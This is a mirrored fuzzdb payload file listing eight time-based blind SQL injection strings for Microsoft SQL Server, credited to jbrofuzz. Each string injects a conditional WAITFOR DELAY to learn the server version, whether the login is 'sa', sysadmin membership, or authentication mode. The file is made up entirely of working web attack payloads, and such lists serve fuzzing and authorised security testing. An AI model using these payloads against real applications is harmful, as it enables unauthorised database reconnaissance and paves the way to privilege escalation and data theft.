mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-12-11 11:42:28 +00:00
9 lines
670 B
Text
9 lines
670 B
Text
# contains statements from jbrofuzz (13 April 2010)
|
|
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
|
|
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
|
|
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
|
|
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
|
|
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
|
|
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
|
|
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
|
|
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
|